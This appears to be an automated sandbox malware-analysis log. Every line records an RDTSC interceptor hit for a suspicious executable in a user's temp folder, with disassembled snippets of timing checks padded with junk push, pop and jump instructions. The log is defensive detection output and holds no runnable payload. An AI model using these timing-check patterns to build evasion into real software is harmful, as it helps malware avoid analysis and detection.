                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 89E277 second address: 89E27C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 808A94 second address: 808A9E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD81D0C8426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8A1BEB second address: 8A1BEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8A1BEF second address: 8A1C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD81D0C8426h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007FD81D0C8426h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8A1E9B second address: 8A1EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8A7701 second address: 8A7713 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FD81D0C842Ch 0x0000000c rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8A7860 second address: 8A7875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop eax 0x0000000d pop esi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8A7875 second address: 8A7879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8A7B14 second address: 8A7B1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8A7B1A second address: 8A7B22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8A7B22 second address: 8A7B60 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD81C888256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD81C888261h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 je 00007FD81C88826Dh 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8A7B60 second address: 8A7B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnl 00007FD81D0C8426h 0x0000000c popad 0x0000000d jno 00007FD81D0C842Ah 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8A8134 second address: 8A813A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8A813A second address: 8A8140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8A8CDF second address: 8A8CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8A9324 second address: 8A932A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8A932A second address: 8A9330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8ADEC2 second address: 8ADEC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8AD096 second address: 8AD0A0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD81C888256h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8AD0A0 second address: 8AD0AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8AD0AD second address: 8AD0B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8AD0B1 second address: 8AD0B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8AD0B9 second address: 8AD0D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD81C888264h 0x0000000b rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8AD3D9 second address: 8AD3DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8AD671 second address: 8AD675 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8AD7DE second address: 8AD7E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FD81D0C8426h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8ADBD2 second address: 8ADBEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD81C888256h 0x0000000a popad 0x0000000b pushad 0x0000000c jl 00007FD81C888256h 0x00000012 jo 00007FD81C888256h 0x00000018 popad 0x00000019 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8ADBEB second address: 8ADBF0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8B2694 second address: 8B269A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8B269A second address: 8B26A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8BB889 second address: 8BB88D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8BB88D second address: 8BB896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8BB896 second address: 8BB8A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD81C88825Ch 0x0000000c rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8BB8A9 second address: 8BB8AF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8BA1CA second address: 8BA1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8BA1D2 second address: 8BA1D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8BA1D9 second address: 8BA1DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8BA1DF second address: 8BA1E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8BA3B5 second address: 8BA3D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81C888268h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8BA64B second address: 8BA651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8BAF73 second address: 8BAFA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD81C888256h 0x0000000a jc 00007FD81C888256h 0x00000010 jmp 00007FD81C888268h 0x00000015 popad 0x00000016 pushad 0x00000017 push esi 0x00000018 pop esi 0x00000019 push edi 0x0000001a pop edi 0x0000001b popad 0x0000001c rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8C132A second address: 8C1332 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8C1054 second address: 8C105A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8C105A second address: 8C105F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8C105F second address: 8C1065 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8C1065 second address: 8C1080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD81D0C8437h 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8C1080 second address: 8C1084 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8CC304 second address: 8CC308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8D0028 second address: 8D002C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8D4504 second address: 8D4508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8D40D1 second address: 8D40D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8D40D7 second address: 8D40DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8E45E9 second address: 8E45F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD81C888256h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8E45F9 second address: 8E4642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD81D0C8426h 0x0000000a je 00007FD81D0C8426h 0x00000010 popad 0x00000011 jmp 00007FD81D0C8433h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jc 00007FD81D0C8426h 0x00000020 pushad 0x00000021 popad 0x00000022 jns 00007FD81D0C8426h 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FD81D0C8430h 0x00000030 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8E4642 second address: 8E464E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD81C888256h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8E464E second address: 8E466D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD81D0C8439h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8E466D second address: 8E4677 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD81C888256h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 803A06 second address: 803A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8ECA70 second address: 8ECA76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8ECA76 second address: 8ECA7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8ECBD6 second address: 8ECBEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007FD81C888256h 0x0000000b pop eax 0x0000000c jc 00007FD81C88825Eh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8ECD4A second address: 8ECD91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edi 0x00000006 pop edi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 popad 0x0000000a jmp 00007FD81D0C842Ah 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007FD81D0C8430h 0x00000017 jmp 00007FD81D0C842Dh 0x0000001c pushad 0x0000001d jmp 00007FD81D0C8430h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8ED03B second address: 8ED04F instructions: 0x00000000 rdtsc 0x00000002 js 00007FD81C888256h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FD81C888256h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8ED04F second address: 8ED080 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD81D0C8437h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD81D0C8433h 0x00000011 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8EDF9C second address: 8EDFAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FD81C88825Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8F0FEE second address: 8F0FF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8F0FF2 second address: 8F1022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD81C888256h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007FD81C888274h 0x00000012 jmp 00007FD81C888268h 0x00000017 je 00007FD81C888256h 0x0000001d rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8F5D49 second address: 8F5D7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FD81D0C8432h 0x0000000a jmp 00007FD81D0C8435h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8F5D7C second address: 8F5D80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 8FE322 second address: 8FE330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jnp 00007FD81D0C8426h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 90E9E8 second address: 90E9EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 911171 second address: 91119F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 jmp 00007FD81D0C8433h 0x0000000b js 00007FD81D0C8426h 0x00000011 pop edx 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 pop ebx 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push esi 0x0000001d pop esi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 91119F second address: 9111A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 911328 second address: 91133D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FD81D0C842Dh 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 91133D second address: 911341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 914BD4 second address: 914BDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edi 0x0000000a rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92A29C second address: 92A2A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92A424 second address: 92A42A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92A42A second address: 92A446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007FD81C888256h 0x0000000d jne 00007FD81C888256h 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push edi 0x0000001b pop edi 0x0000001c rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92A446 second address: 92A44A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXERDTSC instruction interceptor: First address: 92A44A second address: 92A46F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FD81C88825Ch 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007FD81C88825Eh 0x00000016 ja 00007FD81C888256h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
